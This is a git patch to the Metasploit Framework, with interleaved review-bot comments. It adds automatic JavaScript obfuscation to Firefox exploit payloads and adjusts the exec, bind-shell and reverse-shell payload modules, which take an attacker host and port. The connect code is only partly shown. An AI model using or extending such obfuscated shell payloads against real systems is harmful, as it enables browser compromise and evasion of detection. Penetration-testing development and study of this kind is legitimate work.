From b96a7ed1d048d0089e738fdbabb041522347b398 Mon Sep 17 00:00:00 2001
From: Joe Vennix
Date: Wed, 24 Sep 2014 16:05:00 -0500
Subject: [PATCH] Install a global object in firefox payloads, bump jsobfu.
---
 Gemfile.lock | 4 ++--
 .../remote/firefox_privilege_escalation.rb | 1 +
 lib/msf/core/payload/firefox.rb | 21 +++++++++++--------
 metasploit-framework.gemspec | 2 +-
 modules/payloads/singles/firefox/exec.rb | 1 +
 .../singles/firefox/shell_bind_tcp.rb | 1 +
 .../singles/firefox/shell_reverse_tcp.rb | 2 ++
 7 files changed, 20 insertions(+), 12 deletions(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index ed2e935cf6..87772d454d 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -5,7 +5,7 @@ PATH
 actionpack (< 4.0.0)
 activesupport (>= 3.0.0, < 4.0.0)
 bcrypt
- jsobfu (~> 0.1.7)
+ jsobfu (~> 0.2.0)
 json
 metasploit-concern (~> 0.2.1)
 metasploit-model (~> 0.27.1)
@@ -91,7 +91,7 @@ GEM
 hike (1.2.3)
 i18n (0.6.11)
 journey (1.0.4)
- jsobfu (0.1.7)
+ jsobfu (0.2.0)
 rkelly-remix (= 0.0.6)
 json (1.8.1)
 mail (2.5.4)
diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
index 2ce211a679..000327bbfc 100644
--- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
+++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
@@ -12,6 +12,7 @@ require 'msf/core/exploit/jsobfu'
 module Msf
 module Exploit::Remote::FirefoxPrivilegeEscalation
+ # automatically obfuscate anything that runs through `js_exec`
 include Msf::Exploit::JSObfu
 # Sends the +js+ code to the remote session, which executes it in Firefox's
diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index 3703b391eb..2d116ca0d4 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -1,9 +1,13 @@
 # -*- coding: binary -*-
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 require 'json'
 module Msf::Payload::Firefox
+ # automatically obfuscate every Firefox payload
+ include Msf::Exploit::JSObfu
+
 # Javascript source code of setTimeout(fn, delay)
 # @return [String] javascript source code that exposes the setTimeout(fn, delay) method
 def set_timeout_source
@@ -121,16 +125,15 @@ module Msf::Payload::Firefox
 var retVal = null;
 try {
- retVal = Function(js[1]).call({
- send: function(r){
- if (sent) return;
- sent = true;
- if (r) {
- if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
- else cb(false, r+tag+"\\n");
- }
+ this.send = function(r){
+ if (sent) return;
+ sent = true;
+ if (r) {
+ if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
+ else cb(false, r+tag+"\\n");
 }
- });
+ };
+ retVal = Function(js[1]).call(this);
 } catch (e) { retVal = e.message; }
 sync = false;
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 3f1fd9b334..9217019719 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
 # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
 spec.add_runtime_dependency 'bcrypt'
 # Needed for Javascript obfuscation
- spec.add_runtime_dependency 'jsobfu', '~> 0.1.7'
+ spec.add_runtime_dependency 'jsobfu', '~> 0.2.0'
 # Needed for some admin modules (scrutinizer_add_user.rb)
 spec.add_runtime_dependency 'json'
 # Metasploit::Concern hooks
diff --git a/modules/payloads/singles/firefox/exec.rb b/modules/payloads/singles/firefox/exec.rb
index 7c9b7afc9b..0487ed87e2 100644
--- a/modules/payloads/singles/firefox/exec.rb
+++ b/modules/payloads/singles/firefox/exec.rb
@@ -34,6 +34,7 @@ module Metasploit3
 <<-EOS
 (function(){
+ window = this;
 #{read_file_source if datastore['WSCRIPT']}
 #{run_cmd_source if datastore['WSCRIPT']}
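Review bot: The comment added above `include Msf::Exploit::JSObfu` in the first hunk of lib/msf/core/payload/firefox.rb says every Firefox payload is obfuscated automatically, but the include by itself only mixes the module in; nothing in this hunk shows where obfuscation is applied to the generated source, so the comment documents an effect rather than a mechanism. A reader who later sees an unobfuscated payload will not know whether that is a bug or expected. Rewording it to say what the include actually provides, e.g. `# mix in Msf::Exploit::JSObfu so Firefox payload modules can run their generated JS through its obfuscation helper`, keeps the claim checkable; if some caller really does invoke the helper unconditionally, naming that call site here is worth the extra words.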
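Review bot: In the second hunk of lib/msf/core/payload/firefox.rb the new `this.send = function(r){ … };` assignment sits inside the same `try` as the command itself, so a failure to install the property (for instance `this` being undefined or non-extensible because of how the enclosing function, which starts and ends outside this hunk, is invoked) is caught and reported through `retVal = e.message` exactly like an error raised by `js[1]`; a broken harness then looks like a failed command. Moving the `this.send = …` block above `try {` so that only `retVal = Function(js[1]).call(this);` is guarded keeps the two failure modes distinguishable. Separately, the old code passed a fresh object literal per command while the new code reuses `this`, so any property one command attaches to the receiver is visible to the next; that appears to be the intent of the commit, but a one-line comment such as `// commands share this receiver, so state one command attaches to it persists to the next` would stop a future reader from "fixing" it back.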
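Review bot: `window = this;` in the exec.rb hunk assigns to an identifier the payload never declares, so in sloppy mode it creates or overwrites a binding named window on the enclosing global and under strict mode it throws a ReferenceError; the same line is added in the shell_bind_tcp.rb and shell_reverse_tcp.rb hunks. If the only goal is to give the code below a handle on the shared receiver, `var window = this;` keeps the alias local to the IIFE and cannot clobber an existing global of that name. If a global really is intended (the commit title suggests it is), a short comment on the line, e.g. `window = this; // deliberately global: helpers below reference window`, makes the unqualified assignment read as a decision rather than a missing var. The heredoc and the generate method that contain these lines begin and end outside the hunks.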
diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb
index 377c25a624..115755b92e 100644
--- a/modules/payloads/singles/firefox/shell_bind_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb
@@ -34,6 +34,7 @@ module Metasploit3
 def generate
 %Q|
 (function(){
+ window = this;
 Components.utils.import("resource://gre/modules/NetUtil.jsm");
 var lport = #{datastore["LPORT"]};
 var rhost = "#{datastore['RHOST']}";
diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
index e3a8d572fe..22fc3a6327 100644
--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -32,6 +32,8 @@ module Metasploit3
 <<-EOS
 (function(){
+ window = this;
+ Components.utils.import("resource://gre/modules/NetUtil.jsm");
 var host = '#{datastore["LHOST"]}';
 var port = #{datastore["LPORT"]};